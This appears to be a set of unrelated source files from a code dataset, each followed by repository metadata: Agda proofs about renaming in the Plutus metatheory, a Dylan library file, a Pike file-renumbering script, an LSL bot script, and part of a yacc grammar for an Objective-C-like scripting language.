(Δ ,⋆ K) extˢ⋆ ρ (T x) = T (ρ x) renˢ : ∀ {Φ Γ Δ} → (ρ : Renˢ Γ Δ) → {A : Φ ⊢Nf⋆ *} → Γ ⊢ A ----- → Δ ⊢ A renˢ ρ (` x) = ` (ρ x) renˢ ρ (ƛ M) = ƛ (renˢ (extˢ ρ) M) renˢ ρ (L · M) = renˢ ρ L · renˢ ρ M renˢ ρ (Λ M) = Λ (renˢ (extˢ⋆ ρ) M) renˢ ρ (M ·⋆ A / p) = renˢ ρ M ·⋆ A / p renˢ ρ (wrap A B M) = wrap A B (renˢ ρ M) renˢ ρ (unwrap M p) = unwrap (renˢ ρ M) p renˢ ρ (con c) = con c renˢ ρ (builtin b / p) = builtin b / p renˢ ρ (error _) = error _ weakenˢ : ∀ {Φ Γ}{A : Φ ⊢Nf⋆ *}{B : Φ ⊢Nf⋆ *} → Γ ⊢ A --------- → Γ , B ⊢ A weakenˢ M = renˢ S M -- cannot define this using renˢ {- weaken⋆ˢ : ∀ {Φ Γ}{A : Φ ⊢Nf⋆ *}{K} → Γ ⊢ A ------------------ → Γ ,⋆ K ⊢ weakenNf A -} extˢ-id : ∀ {Φ Γ}{A B : Φ ⊢Nf⋆ *}(x : Γ , A ∋ B) → extˢ id x ≡ x extˢ-id Z = refl extˢ-id (S x) = refl extˢ-comp : ∀ {Φ Γ Δ Θ}{A B : Φ ⊢Nf⋆ *} → {ρ : Renˢ Δ Θ}{ρ' : Renˢ Γ Δ}(x : Γ , B ∋ A) → extˢ (ρ ∘ ρ') x ≡ extˢ ρ (extˢ ρ' x) extˢ-comp Z = refl extˢ-comp (S x) = refl extˢ⋆-id : ∀ {Φ Γ}{K}{A : Φ ,⋆ K ⊢Nf⋆ *}(x : Γ ,⋆ K ∋ A) → extˢ⋆ id x ≡ x extˢ⋆-id (T x) = refl extˢ⋆-comp : ∀ {Φ Γ Δ Θ}{K}{A : Φ ,⋆ K ⊢Nf⋆ *} → {ρ : Renˢ Δ Θ}{ρ' : Renˢ Γ Δ}(x : Γ ,⋆ K ∋ A) → extˢ⋆ (ρ ∘ ρ') x ≡ extˢ⋆ ρ (extˢ⋆ ρ' x) extˢ⋆-comp (T x) = refl extˢ-cong : ∀{Φ}{Γ Δ : Ctx Φ}{ρ ρ' : Renˢ Γ Δ} → (∀{A}(x : Γ ∋ A) → ρ x ≡ ρ' x) → ∀{A B}(x : Γ , A ∋ B) -------------------------------- → extˢ ρ x ≡ extˢ ρ' x extˢ-cong p Z = refl extˢ-cong p (S x) = cong S (p x) extˢ⋆-cong : ∀{Φ}{Γ Δ : Ctx Φ}{ρ ρ' : Renˢ Γ Δ} → (∀{A}(x : Γ ∋ A) → ρ x ≡ ρ' x) → ∀{K B}(x : Γ ,⋆ K ∋ B) -------------------------------- → extˢ⋆ ρ x ≡ extˢ⋆ ρ' x extˢ⋆-cong p (T x) = cong T (p x) renˢ-cong : ∀{Φ}{Γ Δ : Ctx Φ}{ρ ρ' : Renˢ Γ Δ} → (∀{A}(x : Γ ∋ A) → ρ x ≡ ρ' x) → ∀{A}(M : Γ ⊢ A) -------------------------------- → renˢ ρ M ≡ renˢ ρ' M renˢ-cong p (` x) = cong ` (p x) renˢ-cong p (ƛ M) = cong ƛ (renˢ-cong (extˢ-cong p) M) renˢ-cong p (L · M) = cong₂ _·_ (renˢ-cong p L) (renˢ-cong p M) renˢ-cong p (Λ M) = cong Λ (renˢ-cong (extˢ⋆-cong p) M) renˢ-cong p (M ·⋆ A / q) = cong (_·⋆ A / q) (renˢ-cong p M) renˢ-cong p (wrap A B M) = cong (wrap A B) (renˢ-cong p M) renˢ-cong p (unwrap M q) = cong (λ M → unwrap M q) (renˢ-cong p M) renˢ-cong p (con c) = refl renˢ-cong p (builtin b / q) = refl renˢ-cong p (error _) = refl renˢ-id : ∀ {Φ Γ}{A : Φ ⊢Nf⋆ *}(M : Γ ⊢ A) → renˢ id M ≡ M renˢ-id (` x) = refl renˢ-id (ƛ M) = cong ƛ (trans (renˢ-cong extˢ-id M) (renˢ-id M)) renˢ-id (L · M) = cong₂ _·_ (renˢ-id L) (renˢ-id M) renˢ-id (Λ M) = cong Λ (trans (renˢ-cong extˢ⋆-id M) (renˢ-id M)) renˢ-id (M ·⋆ A / p) = cong (_·⋆ A / p) (renˢ-id M) renˢ-id (wrap A B M) = cong (wrap A B) (renˢ-id M) renˢ-id (unwrap M p) = cong (λ M → unwrap M p) (renˢ-id M) renˢ-id (con c) = refl renˢ-id (builtin b / p) = refl renˢ-id (error _) = refl renˢ-comp : ∀ {Φ Γ Δ Θ}{A : Φ ⊢Nf⋆ *} → {ρ : Renˢ Δ Θ}{ρ' : Renˢ Γ Δ}(M : Γ ⊢ A) → renˢ (ρ ∘ ρ') M ≡ renˢ ρ (renˢ ρ' M) renˢ-comp (` x) = refl renˢ-comp (ƛ M) = cong ƛ (trans (renˢ-cong extˢ-comp M) (renˢ-comp M)) renˢ-comp (L · M) = cong₂ _·_ (renˢ-comp L) (renˢ-comp M) renˢ-comp (Λ M) = cong Λ (trans (renˢ-cong extˢ⋆-comp M) (renˢ-comp M)) renˢ-comp (M ·⋆ A / p) = cong (_·⋆ A / p) (renˢ-comp M) renˢ-comp (wrap A B M) = cong (wrap A B) (renˢ-comp M) renˢ-comp (unwrap M p) = cong (λ M → unwrap M p) (renˢ-comp M) renˢ-comp (con c) = refl renˢ-comp (builtin b / p) = refl renˢ-comp (error _) = refl Subˢ : ∀{Φ} → Ctx Φ → Ctx Φ → Set Subˢ Γ Δ = ∀{A} → Γ ∋ A → Δ ⊢ A extsˢ : ∀ {Φ Γ Δ} → (σ : Subˢ Γ Δ) → {B : Φ ⊢Nf⋆ *} --------------------------------- → Subˢ (Γ , B) (Δ , B) extsˢ σ Z = ` Z extsˢ σ (S α) = weakenˢ (σ α) -- cannot define this using renˢ {- exts⋆ˢ : ∀{Φ}{Γ Δ : Ctx Φ} → (σ : Subˢ Γ Δ) → ∀ {K} ---------------------- → Subˢ (Γ ,⋆ K) (Δ ,⋆ K) -} \end{code}
Literate Agda
4
wout/plutus
plutus-metatheory/src/Algorithmic/RenamingSubstitution.lagda
[ "Apache-2.0" ]
Library: lvl10 Files: lvl10-library lvl10
Dylan
0
Ashindustry007/competitive-programming
programming-challenges/badoo/badoo-challenge-2016/lvl10.lid
[ "WTFPL" ]
/* Reorder the files listed in the arguments by renaming them to include a sequential number. Respects a common prefix. */ int main(int argc,array(string) argv) { string pfx = String.common_prefix(argv[1..]); foreach (argv[1..]; int idx; string from) mv(from, sprintf("%s%d %s", pfx, idx+1, from-pfx)); }
Pike
4
stephenangelico/shed
reorder.pike
[ "MIT" ]
key botID; default { state_entry() { //This creates a bot in the sim with the given name, outfit at the given start position. botID = botCreateBot("Test", "Bot", "", llGetPos(), BOT_CREATE_DEFAULT); } touch_start(integer n) { //Has the bot send an instant message to the person who clicked on this object. botSendInstantMessage(botID, llDetectedKey(0), "Hi, I'm a bot, and I'm messaging you."); } }
LSL
4
Asterionworld/ether
doc/bot LSL Functions/Examples/bot Instant Messaging.lsl
[ "BSD-3-Clause" ]
%{ #define YYDEBUG 1 #define YYERROR_VERBOSE #import <Foundation/Foundation.h> #import "create.h" #import "mf_ast.h" int yyerror(char const *str); int yylex(void); %} %union{ void *identifier; void *expression; void *statement; void *struct_entry; void *dic_entry; void *type_specifier; void *one_case; void *else_if; void *class_definition; void *declare_struct; void *member_definition; void *block_statement; void *list; void *method_name_item; void *function_param; void *declaration; MFAssignKind assignment_operator; MFPropertyModifier property_modifier_list; MFDeclarationModifier declaration_modifier; } %token <identifier> IDENTIFIER %token <expression> DOUBLE_LITERAL %token <expression> STRING_LITERAL %token <expression> INTETER_LITERAL %token <expression> SELF %token <expression> SUPER %token <expression> NIL %token <expression> NULL_ %token <expression> YES_ %token <expression> NO_ %token COLON SEMICOLON COMMA LP RP LB RB LC RC QUESTION DOT ASSIGN AT ADDRESS POWER AND OR NOT EQ NE LT LE GT GE SUB SUB_ASSIGN ADD ADD_ASSIGN ASTERISK_ASSIGN DIV DIV_ASSIGN MOD MOD_ASSIGN INCREMENT DECREMENT ANNOTATION_IF CLASS STRUCT DECLARE SELECTOR RETURN IF ELSE FOR IN WHILE DO SWITCH CASE DEFAULT BREAK CONTINUE PROPERTY WEAK STRONG COPY ASSIGN_MEM NONATOMIC ATOMIC ASTERISK VOID BOOL_ CHAR U_INT INT DOUBLE C_STRING CLASS_ SEL_ ID POINTER BLOCK __WEAK __STRONG STATIC C_FUNCTION TYPEDEF %type <assignment_operator> assignment_operator %type <expression> expression expression_opt struct_literal assign_expression ternary_operator_expression logic_or_expression logic_and_expression equality_expression relational_expression additive_expression multiplication_expression unary_expression postfix_expression primary_expression dic block_body annotation_if %type <identifier> selector selector_1 selector_2 key_work_identifier c_type_identier %type <list> identifier_list struct_entry_list dic_entry_list statement_list protocol_list else_if_list case_list member_definition_list method_name method_name_1 method_name_2 expression_list function_param_list c_type_identier_list %type <method_name_item> method_name_item %type <dic_entry> dic_entry %type <struct_entry> struct_entry %type <statement> statement top_statement expression_statement if_statement switch_statement for_statement foreach_statement while_statement do_while_statement break_statement continue_statement return_statement declaration_statement %type <type_specifier> type_specifier %type <block_statement> block_statement default_opt %type <declare_struct> declare_struct %type <property_modifier_list> property_modifier_list property_modifier property_rc_modifier property_atomic_modifier %type <class_definition> class_definition %type <member_definition> member_definition property_definition method_definition class_method_definition instance_method_definition %type <one_case> one_case %type <else_if> else_if %type <function_param> function_param %type <declaration> declaration %type <declaration_modifier> declaration_modifier declaration_modifier_list %% compile_util: /*empty*/ | definition_list ; definition_list: definition | definition_list definition ; definition: class_definition { MFClassDefinition *classDefinition = (__bridge_transfer MFClassDefinition *)$1; mf_add_class_definition(classDefinition); } | declare_struct { MFStructDeclare *structDeclare = (__bridge_transfer MFStructDeclare *)$1; mf_add_struct_declare(structDeclare); } | top_statement { MFStatement *statement = (__bridge_transfer MFStatement *)$1; mf_add_statement(statement); } | typedef_definition ; annotation_if: /* empty */ { $$ = nil; } | ANNOTATION_IF LP expression RP { $$ = $3; } ; declare_struct: annotation_if DECLARE STRUCT IDENTIFIER LC IDENTIFIER COLON STRING_LITERAL COMMA IDENTIFIER COLON identifier_list RC { MFExpression *annotaionIfConditionExpr = (__bridge_transfer MFExpression *)$1; NSString *structName = (__bridge_transfer NSString *)$4; NSString *typeEncodingKey = (__bridge_transfer NSString *)$6; MFExpression *typeEncodingValueExpr = (__bridge_transfer MFExpression *)$8; NSString *keysKey = (__bridge_transfer NSString *)$10; NSArray *keysValue = (__bridge_transfer NSArray *)$12; MFStructDeclare *structDeclare = mf_create_struct_declare(annotaionIfConditionExpr, structName, typeEncodingKey, typeEncodingValueExpr, keysKey, keysValue); $$ = (__bridge_retained void *)structDeclare; } | annotation_if DECLARE STRUCT IDENTIFIER LC IDENTIFIER COLON identifier_list COMMA IDENTIFIER COLON STRING_LITERAL RC { MFExpression *annotaionIfConditionExpr = (__bridge_transfer MFExpression *)$1; NSString *structName = (__bridge_transfer NSString *)$4; NSString *keysKey = (__bridge_transfer NSString *)$6; NSArray *keysValue = (__bridge_transfer NSArray *)$8; NSString *typeEncodingKey = (__bridge_transfer NSString *)$10; MFExpression *typeEncodingValueExpr = (__bridge_transfer MFExpression *)$12; MFStructDeclare *structDeclare = mf_create_struct_declare(annotaionIfConditionExpr, structName, typeEncodingKey, typeEncodingValueExpr, keysKey, keysValue); $$ = (__bridge_retained void *)structDeclare; } ; identifier_list: IDENTIFIER { NSMutableArray *list = [NSMutableArray array]; NSString *identifier = (__bridge_transfer NSString *)$1; [list addObject:identifier]; $$ = (__bridge_retained void *)list; } | identifier_list COMMA IDENTIFIER { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; NSString *identifier = (__bridge_transfer NSString *)$3; [list addObject:identifier]; $$ = (__bridge_retained void *)list; } ; class_definition: annotation_if CLASS IDENTIFIER COLON IDENTIFIER LC { MFExpression *annotaionIfConditionExpr = (__bridge_transfer MFExpression *)$1; NSString *name = (__bridge_transfer NSString *)$3; NSString *superNmae = (__bridge_transfer NSString *)$5; mf_start_class_definition(annotaionIfConditionExpr, name, superNmae,nil); } RC { MFClassDefinition *classDefinition = mf_end_class_definition(nil); $$ = (__bridge_retained void *)classDefinition; } | annotation_if CLASS IDENTIFIER COLON IDENTIFIER LC { MFExpression *annotaionIfConditionExpr = (__bridge_transfer MFExpression *)$1; NSString *name = (__bridge_transfer NSString *)$3; NSString *superNmae = (__bridge_transfer NSString *)$5; mf_start_class_definition(annotaionIfConditionExpr, name, superNmae,nil); } member_definition_list RC { NSArray *members = (__bridge_transfer NSArray *)$8; MFClassDefinition *classDefinition = mf_end_class_definition(members); $$ = (__bridge_retained void *)classDefinition; } | annotation_if CLASS IDENTIFIER COLON IDENTIFIER LT protocol_list GT LC { MFExpression *annotaionIfConditionExpr = (__bridge_transfer MFExpression *)$1; NSString *name = (__bridge_transfer NSString *)$3; NSString *superNmae = (__bridge_transfer NSString *)$5; NSArray *protocolNames = (__bridge_transfer NSArray *)$7; mf_start_class_definition(annotaionIfConditionExpr, name, superNmae,protocolNames); } RC { MFClassDefinition *classDefinition = mf_end_class_definition(nil); $$ = (__bridge_retained void *)classDefinition; } | annotation_if CLASS IDENTIFIER COLON IDENTIFIER LT protocol_list GT LC { MFExpression *annotaionIfConditionExpr = (__bridge_transfer MFExpression *)$1; NSString *name = (__bridge_transfer NSString *)$3; NSString *superNmae = (__bridge_transfer NSString *)$5; NSArray *protocolNames = (__bridge_transfer NSArray *)$7; mf_start_class_definition(annotaionIfConditionExpr, name, superNmae,protocolNames); } member_definition_list RC { NSArray *members = (__bridge_transfer NSArray *)$11; MFClassDefinition *classDefinition = mf_end_class_definition(members); $$ = (__bridge_retained void *)classDefinition; } ; protocol_list: IDENTIFIER { NSMutableArray *list = [NSMutableArray array]; NSString *identifier = (__bridge_transfer NSString *)$1; [list addObject:identifier]; $$ = (__bridge_retained void *)list; } | protocol_list COMMA IDENTIFIER { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; NSString *identifier = (__bridge_transfer NSString *)$3; [list addObject:identifier]; $$ = (__bridge_retained void *)list; } ; property_definition: annotation_if PROPERTY LP property_modifier_list RP type_specifier IDENTIFIER SEMICOLON { MFExpression *annotaionIfConditionExpr = (__bridge_transfer MFExpression *)$1; MFPropertyModifier modifier = $4; MFTypeSpecifier *typeSpecifier = (__bridge_transfer MFTypeSpecifier *)$6; NSString *name = (__bridge_transfer NSString *)$7; MFPropertyDefinition *propertyDefinition = mf_create_property_definition(annotaionIfConditionExpr, modifier, typeSpecifier, name); $$ = (__bridge_retained void *)propertyDefinition; } | annotation_if PROPERTY LP RP type_specifier IDENTIFIER SEMICOLON { MFExpression *annotaionIfConditionExpr = (__bridge_transfer MFExpression *)$1; MFTypeSpecifier *typeSpecifier = (__bridge_transfer MFTypeSpecifier *)$5; NSString *name = (__bridge_transfer NSString *)$6; MFPropertyDefinition *propertyDefinition = mf_create_property_definition(annotaionIfConditionExpr, 0x00, typeSpecifier, name); $$ = (__bridge_retained void *)propertyDefinition; } ; property_modifier_list: property_modifier | property_modifier_list COMMA property_modifier { $$ = $1 | $3; } ; property_modifier: property_rc_modifier | property_atomic_modifier ; property_rc_modifier: WEAK { $$ = MFPropertyModifierMemWeak; } | STRONG { $$ = MFPropertyModifierMemStrong; } | COPY { $$ = MFPropertyModifierMemCopy; } | ASSIGN_MEM { $$ = MFPropertyModifierMemAssign; } ; property_atomic_modifier: NONATOMIC { $$ = MFPropertyModifierNonatomic; } | ATOMIC { $$ = MFPropertyModifierAtomic; } ; typedef_definition: TYPEDEF BOOL_ IDENTIFIER SEMICOLON { mf_add_typedef(MF_TYPE_BOOL, (__bridge_transfer NSString *)$3); } | TYPEDEF INT IDENTIFIER SEMICOLON { mf_add_typedef(MF_TYPE_INT, (__bridge_transfer NSString *)$3); } | TYPEDEF U_INT IDENTIFIER SEMICOLON { mf_add_typedef(MF_TYPE_U_INT, (__bridge_transfer NSString *)$3); } | TYPEDEF DOUBLE IDENTIFIER SEMICOLON { mf_add_typedef(MF_TYPE_DOUBLE, (__bridge_transfer NSString *)$3); } | TYPEDEF C_STRING IDENTIFIER SEMICOLON { mf_add_typedef(MF_TYPE_C_STRING, (__bridge_transfer NSString *)$3); } | TYPEDEF ID IDENTIFIER SEMICOLON { mf_add_typedef(MF_TYPE_OBJECT, (__bridge_transfer NSString *)$3); } | TYPEDEF BLOCK IDENTIFIER SEMICOLON { mf_add_typedef(MF_TYPE_BLOCK, (__bridge_transfer NSString *)$3); } | TYPEDEF CLASS_ IDENTIFIER SEMICOLON { mf_add_typedef(MF_TYPE_CLASS, (__bridge_transfer NSString *)$3); } | TYPEDEF SEL_ IDENTIFIER SEMICOLON { mf_add_typedef(MF_TYPE_SEL, (__bridge_transfer NSString *)$3); } | TYPEDEF POINTER IDENTIFIER SEMICOLON { mf_add_typedef(MF_TYPE_POINTER, (__bridge_transfer NSString *)$3); } | TYPEDEF IDENTIFIER IDENTIFIER SEMICOLON { mf_add_typedef_from_alias((__bridge_transfer NSString *)$2,(__bridge_transfer NSString *)$3); } ; type_specifier: VOID { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_VOID); } | BOOL_ { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_BOOL); } | INT { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_INT); } | U_INT { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_U_INT); } | DOUBLE { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_DOUBLE); } | C_STRING { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_C_STRING); } |ID { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_OBJECT); } |CLASS_ { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_CLASS); } |SEL_ { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_SEL); } | BLOCK { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_BLOCK); } | POINTER { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_POINTER); } | C_FUNCTION LT c_type_identier_list GT { NSArray *typeList = (__bridge_transfer NSArray *)$3; $$ = (__bridge_retained void *)mf_create_cfuntion_type_specifier(typeList); } | IDENTIFIER ASTERISK { $$ = (__bridge_retained void *)mf_create_type_specifier(MF_TYPE_OBJECT); } | STRUCT IDENTIFIER { $$ = (__bridge_retained void *)mf_create_struct_type_specifier((__bridge_transfer NSString *)$2); } | IDENTIFIER { MFTypedefTable *typedefTable = [MFTypedefTable shareInstance]; MFTypeSpecifierKind type = [typedefTable typeWtihIdentifer:(__bridge_transfer NSString *)$1]; $$ = (__bridge_retained void *)mf_create_type_specifier(type); } ; method_definition: instance_method_definition | class_method_definition ; instance_method_definition: annotation_if SUB LP type_specifier RP method_name block_statement { MFExpression *annotaionIfConditionExpr = (__bridge_transfer MFExpression *)$1; MFTypeSpecifier *returnTypeSpecifier = (__bridge_transfer MFTypeSpecifier *)$4; NSArray *items = (__bridge_transfer NSArray *)$6; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$7; MFMethodDefinition *methodDefinition = mf_create_method_definition(annotaionIfConditionExpr, NO, returnTypeSpecifier, items, block); $$ = (__bridge_retained void *)methodDefinition; } ; class_method_definition: annotation_if ADD LP type_specifier RP method_name block_statement { MFExpression *annotaionIfConditionExpr = (__bridge_transfer MFExpression *)$1; MFTypeSpecifier *returnTypeSpecifier = (__bridge_transfer MFTypeSpecifier *)$4; NSArray *items = (__bridge_transfer NSArray *)$6; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$7; MFMethodDefinition *methodDefinition = mf_create_method_definition(annotaionIfConditionExpr, YES, returnTypeSpecifier, items, block); $$ = (__bridge_retained void *)methodDefinition; } ; method_name: method_name_1 | method_name_2 ; method_name_1: IDENTIFIER { NSString *name = (__bridge_transfer NSString *)$1; MFMethodNameItem *item = mf_create_method_name_item(name, nil, nil); NSMutableArray *list = [NSMutableArray array]; [list addObject:item]; $$ = (__bridge_retained void *)list; } ; method_name_2: method_name_item { NSMutableArray *list = [NSMutableArray array]; MFMethodNameItem *item = (__bridge_transfer MFMethodNameItem *)$1; [list addObject:item]; $$ = (__bridge_retained void *)list; } | method_name_2 method_name_item { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; MFMethodNameItem *item = (__bridge_transfer MFMethodNameItem *)$2; [list addObject:item]; $$ = (__bridge_retained void *)list; } ; method_name_item: IDENTIFIER COLON LP type_specifier RP IDENTIFIER { NSString *name = (__bridge_transfer NSString *)$1; name = [NSString stringWithFormat:@"%@:",name]; MFTypeSpecifier *typeSpecifier = (__bridge_transfer MFTypeSpecifier *)$4; NSString *paramName = (__bridge_transfer NSString *)$6; MFMethodNameItem *item = mf_create_method_name_item(name, typeSpecifier, paramName); $$ = (__bridge_retained void *)item; } ; member_definition: property_definition | method_definition ; member_definition_list: member_definition { NSMutableArray *list = [NSMutableArray array]; MFMemberDefinition *memberDefinition = (__bridge_transfer MFMemberDefinition *)$1; [list addObject:memberDefinition]; $$ = (__bridge_retained void *)list; } | member_definition_list member_definition { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; MFMemberDefinition *memberDefinition = (__bridge_transfer MFMemberDefinition *)$2; [list addObject:memberDefinition]; $$ = (__bridge_retained void *)list; } ; selector: selector_1 | selector_2 ; selector_1: IDENTIFIER | key_work_identifier ; selector_2: selector_1 COLON { NSString *name = (__bridge_transfer NSString *)$1; NSString *selector = [NSString stringWithFormat:@"%@:",name]; $$ = (__bridge_retained void *)selector; } | selector_2 selector_1 COLON { NSString *name1 = (__bridge_transfer NSString *)$1; NSString *name2 = (__bridge_transfer NSString *)$2; NSString *selector = [NSString stringWithFormat:@"%@%@:", name1, name2]; $$ = (__bridge_retained void *)selector; } ; expression: assign_expression ; assign_expression: ternary_operator_expression | primary_expression assignment_operator ternary_operator_expression { MFAssignExpression *expr = (MFAssignExpression *)mf_create_expression(MF_ASSIGN_EXPRESSION); expr.assignKind = $2; expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } ; assignment_operator: ASSIGN { $$ = MF_NORMAL_ASSIGN; } | SUB_ASSIGN { $$ = MF_SUB_ASSIGN; } | ADD_ASSIGN { $$ = MF_ADD_ASSIGN; } | ASTERISK_ASSIGN { $$ = MF_MUL_ASSIGN; } | DIV_ASSIGN { $$ = MF_DIV_ASSIGN; } | MOD_ASSIGN { $$ = MF_MOD_ASSIGN; } ; ternary_operator_expression: logic_or_expression | logic_or_expression QUESTION ternary_operator_expression COLON ternary_operator_expression { MFTernaryExpression *expr = (MFTernaryExpression *)mf_create_expression(MF_TERNARY_EXPRESSION); expr.condition = (__bridge_transfer MFExpression *)$1; expr.trueExpr = (__bridge_transfer MFExpression *)$3; expr.falseExpr = (__bridge_transfer MFExpression *)$5; $$ = (__bridge_retained void *)expr; } | logic_or_expression QUESTION COLON ternary_operator_expression { MFTernaryExpression *expr = (MFTernaryExpression *)mf_create_expression(MF_TERNARY_EXPRESSION); expr.condition = (__bridge_transfer MFExpression *)$1; expr.falseExpr = (__bridge_transfer MFExpression *)$4; $$ = (__bridge_retained void *)expr; } ; logic_or_expression: logic_and_expression | logic_or_expression OR logic_and_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_LOGICAL_OR_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } ; logic_and_expression: equality_expression | logic_and_expression AND equality_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_LOGICAL_AND_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } ; equality_expression: relational_expression | equality_expression EQ relational_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_EQ_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } | equality_expression NE relational_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_NE_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } ; relational_expression: additive_expression | relational_expression LT additive_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_LT_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } | relational_expression LE additive_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_LE_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } | relational_expression GT additive_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_GT_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } | relational_expression GE additive_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_GE_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } ; additive_expression: multiplication_expression | additive_expression ADD multiplication_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_ADD_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } | additive_expression SUB multiplication_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_SUB_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } ; multiplication_expression: unary_expression | multiplication_expression ASTERISK unary_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_MUL_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } | multiplication_expression DIV unary_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_DIV_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } | multiplication_expression MOD unary_expression { MFBinaryExpression *expr = (MFBinaryExpression *)mf_create_expression(MF_MOD_EXPRESSION); expr.left = (__bridge_transfer MFExpression *)$1; expr.right = (__bridge_transfer MFExpression *)$3; $$ = (__bridge_retained void *)expr; } ; unary_expression: postfix_expression | NOT unary_expression { MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(MF_LOGICAL_NOT_EXPRESSION); MFExpression *subExpr = (__bridge_transfer MFExpression *)$2; expr.expr = subExpr; $$ = (__bridge_retained void *)expr; } | SUB unary_expression { MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(NSC_NEGATIVE_EXPRESSION); MFExpression *subExpr = (__bridge_transfer MFExpression *)$2; expr.expr = subExpr; $$ = (__bridge_retained void *)expr; } ; postfix_expression: primary_expression | primary_expression INCREMENT { MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(MF_INCREMENT_EXPRESSION); MFExpression *subExpr = (__bridge_transfer MFExpression *)$1; expr.expr = subExpr; $$ = (__bridge_retained void *)expr; } | primary_expression DECREMENT { MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(MF_DECREMENT_EXPRESSION); MFExpression *subExpr = (__bridge_transfer MFExpression *)$1; expr.expr = subExpr; $$ = (__bridge_retained void *)expr; } ; expression_list: assign_expression { NSMutableArray *list = [NSMutableArray array]; MFExpression *expr = (__bridge_transfer MFExpression *)$1; [list addObject:expr]; $$ = (__bridge_retained void *)list; } | expression_list COMMA assign_expression { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; MFExpression *expr = (__bridge_transfer MFExpression *)$3; [list addObject:expr]; $$ = (__bridge_retained void *)list; } ; dic_entry: primary_expression COLON primary_expression { MFExpression *keyExpr = (__bridge_transfer MFExpression *)$1; MFExpression *valueExpr = (__bridge_transfer MFExpression *)$3; MFDicEntry *dicEntry = mf_create_dic_entry(keyExpr, valueExpr); $$ = (__bridge_retained void *)dicEntry; } ; dic_entry_list: dic_entry { NSMutableArray *list = [NSMutableArray array]; MFDicEntry *dicEntry = (__bridge_transfer MFDicEntry *)$1; [list addObject:dicEntry]; $$ = (__bridge_retained void *)list; } | dic_entry_list COMMA dic_entry { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; MFDicEntry *dicEntry = (__bridge_transfer MFDicEntry *)$3; [list addObject:dicEntry]; $$ = (__bridge_retained void *)list; } ; dic: AT LC dic_entry_list RC { MFDictionaryExpression *expr = (MFDictionaryExpression *)mf_create_expression(MF_DIC_LITERAL_EXPRESSION); NSArray *entriesExpr = (__bridge_transfer NSArray *)$3; expr.entriesExpr = entriesExpr; $$ = (__bridge_retained void *)expr; } | AT LC RC { MFDictionaryExpression *expr = (MFDictionaryExpression *)mf_create_expression(MF_DIC_LITERAL_EXPRESSION); $$ = (__bridge_retained void *)expr; } ; struct_entry: IDENTIFIER COLON primary_expression { NSString *key = (__bridge_transfer NSString *)$1; MFExpression *valueExpr = (__bridge_transfer MFExpression *)$3; MFStructEntry *structEntry = mf_create_struct_entry(key, valueExpr); 